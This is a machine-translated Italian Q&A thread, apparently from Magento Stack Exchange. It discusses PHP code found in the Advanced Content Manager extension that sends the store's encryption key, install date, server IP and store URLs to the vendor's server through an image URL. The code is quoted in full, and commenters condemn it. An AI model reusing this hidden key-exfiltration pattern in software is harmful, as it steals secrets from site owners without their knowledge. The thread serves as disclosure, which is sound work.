Qualche buona ragione per cui un modulo accede in remoto a global / crypt / key?

Perdona la mia ignoranza, ma la chiave di crittografia viene utilizzata per decrittografare i dati di Magento, giusto? C'è un buon motivo per accedere a un modulo? Mi sono imbattuto in questo codice dopo aver installato Advanced Content Manager ...

<div id="banana-tracker">
<?php
    $stores = Mage::app()->getStores();
    $key = (string)Mage::getConfig()->getNode('global/crypt/key');
    $date = (string)Mage::getConfig()->getNode('global/install/date');
    $serverIp = $_SERVER['SERVER_ADDR'];

    $params = 'key='.$key.'&date='.$date.'&';

    foreach($stores as $store)
    {
        $params .= 'store_'.$store->getCode().'='.urlencode(Mage::app()->getStore($store->getId())->getBaseUrl(Mage_Core_Model_Store::URL_TYPE_LINK)).'&';
    }
?>
<img src="http://www.advancedcontentmanager.com/images/distant/banana-tracker.gif?<?php echo $params; ?>time=<?php echo time(); ?>&serverip=<?php echo $serverIp; ?>" />

magento-1.9

— TylersSN
fonte

QUESTO. È. ORRIBILE. Non c'è motivo di perdere la chiave di crittografia.

— Fabian Blechschmidt,

Questo è male, molto male.

— Anna Völkl

Bella presa! Questo è estremamente negativo ...

— Sander Mangel

Grazie @Sander per avercelo detto. È stato rimosso da Connect.

— segna il

@benmarks è felice di saperlo. Ciò è estremamente deludente per le ovvie ragioni e perché l'app è stata estremamente impressionante e lo sviluppatore è stato estremamente utile e rapido in passato.

— TylersSN,

Risposte:

Sì ... c'è una buona ragione.
Vogliono conoscerlo e registrarlo, per ogni evenienza. :)

Dovresti disinstallare l'estensione (molto probabilmente l'hai già fatto). Non utilizzare mai estensioni che "telefonano a casa", indipendentemente dai dati che inviano a casa.

Potresti voler elencare l'estensione qui affinché gli altri possano vedere: Codice divertente / inutile / orribile dalle estensioni di Magento

— Marius
fonte

"telefonare a casa" purtroppo è fatto da molti moduli. Lo fanno anche Amasty e Aheadworks: \

— Sander Mangel

Questo gist.github.com/miguelbalparda/b57a47a010a5995bc44d può essere utilizzato per controllare global / crypt / key dalla CLI in tutte le cartelle eccellere app / code / core.

— mbalparda,

Quindi non solo sono in grado di decrittografare le password dei dati cc (buona cosa non lo salvo), ecc. Ma ho pagato $ 300 per loro di avere quella capacità. Questo è ciò che dovrebbe essere pubblicato su Funny.

— TylersSN,

@iUseMagentoNow. Questo è divertente "ooh", non divertente "ah ah". Dovresti chiedere il rimborso.

— Marius

Oggi abbiamo ricevuto la richiesta di supporto per questa funzione. Lo abbiamo già risolto e rimosso questo pezzo di codice. Una nuova versione è disponibile per tutti i nostri clienti nella loro area clienti (gratuitamente, poiché offriamo un aggiornamento illimitato).

So che dobbiamo giustificarlo, quindi facciamolo:

L'obiettivo di questo tracker era SOLO seguire l'uso non autorizzato della nostra estensione.
Il tracker è stato visualizzato solo nell'area di amministrazione (nessuno dei tuoi clienti o nessun altro che tu e noi sia stato in grado di vederlo).
Abbiamo rimosso anche questo nel nostro DB.
La chiave è solo per crittografare la password dell'amministratore. Dato che lavoriamo con tutti voi tramite richieste di supporto, potreste avervi già inviato le vostre credenziali via e-mail, per supporto. Se volessimo la tua password, l'avremmo inviata direttamente ... Non era l'obiettivo.
Anche con la chiave, la tua password è ancora crittografata. E l'amministratore magento blocca l'utente dopo alcuni tentativi.

Riconosciamo che si tratta di un errore, e questa è la forza della comunità e del sistema open source: possiamo riparare e migliorare molto più velocemente. Grazie a tutti per averci avvisato, faremo ora maggiori sforzi sulla vulnerabilità.

— Gestione contenuti avanzata
fonte

+1 per l'impegno a rispondere qui in pubblico su Magento SE!

— ottobre

Uso non autorizzato dell'estensione ?! Puoi semplicemente usare il dominio per quello.

— mbalparda,